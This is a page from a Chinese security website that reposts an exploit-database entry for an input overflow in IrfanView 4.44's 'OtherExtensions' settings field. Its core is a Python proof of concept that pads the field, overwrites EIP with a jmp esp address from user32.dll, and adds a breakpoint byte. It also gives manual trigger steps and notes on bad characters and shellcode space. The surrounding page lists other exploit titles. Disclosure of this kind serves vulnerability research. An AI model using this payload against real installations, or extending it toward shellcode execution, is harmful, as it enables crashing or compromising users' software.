首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 IrfanView 4.44 - Denial of Service 来源：vfocus.net 作者：Orprecio 发布时间：2017-05-05   # Exploit Title: Irfanview - OtherExtensions Input Overflow # Date: 29-04-2017 # Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button # Exploit Author: Dreivan Orprecio #Version: Irfanview 4.44 #Irfanview is vulnerable to overflow in "OtherExtensions" input field #Debugging Machine: WinXP Pro SP3 (32bit)     #POC   #!usr/bin/python           eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll             buffer = "OtherExtensions="+"A" *  199 + eip + "\xcc"         print buffer              #a) irfanview->Option->Properties/Settings->Extensions                                 #b) Paste the buffer in the "other" input then press ok, repeat a) and b)           #badcharacters: those instruction that start with 6,7,8,E,F #Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit #Any other way around this?   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Panda Free Antivirus - 'PSKMAD ·Alerton Webtalk 2.5 / 3.3 - Mu ·Microsoft Internet Explorer 11 ·MySQL < 5.6.35 / < 5.7.17 - In ·Simple File Uploader - Arbitra ·Ghostscript 9.21 - Type Confus ·TYPO3 News Module - SQL Inject ·Microsoft Internet Explorer 11 ·Mercurial Custom hg-ssh Wrappe ·Serviio PRO 1.8 DLNA Media Str ·Oracle VirtualBox Guest Additi ·Serviio PRO 1.8 DLNA Media Str   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved